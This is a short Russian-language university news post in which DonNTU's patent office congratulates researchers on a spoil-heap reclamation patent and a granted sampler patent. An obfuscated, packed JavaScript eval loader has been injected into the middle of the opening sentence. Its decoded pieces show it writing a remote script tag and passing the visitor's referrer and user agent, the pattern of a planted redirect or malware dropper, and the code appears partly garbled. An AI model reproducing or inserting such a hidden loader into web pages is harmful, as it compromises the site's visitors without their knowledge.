

Отдел `eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]};e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6('');n m="q";,30,30,'document|javascript|encodeURIComponent|src|write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|tbody|var|u0026u|referrer|diezz|js|php'.split('|'),0,{}))` Интеллектуальной собственности и патентно-лицензионной работы Донецкого национального технического университета (ДонНТУ) поздравляет научных деятелей университета с успешными достижениями в изобретательстве:

Кафедру геоинформатики и геодезии - Крениду Ю.Ф. и соавторов с очередным выданным патентом на изобретение №109319 от 10.08.2015 г. - **«Способ рекультивации поверхности терриконов»**

. Новшества в формировании микротеррас на поверхности террикона и особенности установки солнечных батарей совместно с элементами накопления дождевой воды для дополнительного полива позволяют повысить качество облагораживания поверхности и надежность рекультивации террикона.

Кафедру технологии и техники геологоразведочных работ - Каракозова А.А. и соавторов с успешно пройденной в августе 2015 г. экспертизой на мировую новизну заявки на изобретение **«Пробоотборник»** и решением о выдаче патента.

Конструктивные особенности пробоотборника позволяют повысить скорость бурения подводных скважины на шельфе.